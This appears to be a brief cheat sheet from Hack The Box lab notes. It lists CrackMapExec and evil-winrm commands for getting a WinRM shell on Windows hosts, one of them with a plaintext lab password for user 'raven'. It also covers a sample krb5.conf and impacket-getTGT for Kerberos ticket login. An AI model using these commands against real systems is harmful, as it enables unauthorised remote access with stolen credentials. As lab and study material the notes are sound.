winrm
CME
cme winrm manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
evil-winrm
simple connection
evil-winrm -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -i manager.htb
connection using kerberos
export KRB5CCNAME=user.ccache
# modify /etc/krb5.conf
โโโ(kaliใฟkali)-[~/hack-the-box/machines]
โโ$ cat /etc/krb5.conf
[libdefaults]
default_realm = DOMAIN.LOCAL
dns_lookup_realm = false
dns_lookup_kdc = false
forwardable = true
[realms]
DOMAIN.LOCAL = {
kdc = dc01.domain.local
admin_server = dc01.domain.local
}
[domain_realm]
.domain.local = DOMAIN.LOCAL
domain.local = DOMAIN.LOCAL
# Get ticket
impacket-getTGT domain/username:'Password' -dc-ip dc01.infiltrator.htb
evil-winrm -u 'user.ccache' -p -i domain.local -r domain.local
Last updated